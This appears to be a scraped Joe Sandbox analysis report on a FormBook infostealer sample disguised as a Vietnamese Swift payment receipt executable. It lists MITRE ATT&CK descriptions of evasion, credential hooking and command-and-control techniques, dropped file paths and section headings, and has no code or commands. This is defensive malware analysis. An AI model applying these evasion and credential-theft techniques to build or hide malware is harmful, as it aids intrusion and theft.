Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3z24q121.xny.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_540tlhfv.v01.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qn4nmjjf.ku2.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yqurixrq.wpr.ps1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Function 053426D1 Relevance: 6.1, APIs: 4, Instructions: 134
threadCOMMON

Function 053426E0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 0A2A02BC Relevance: 1.8, APIs: 1, Instructions: 281
processCOMMON

Function 0A2A02C8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre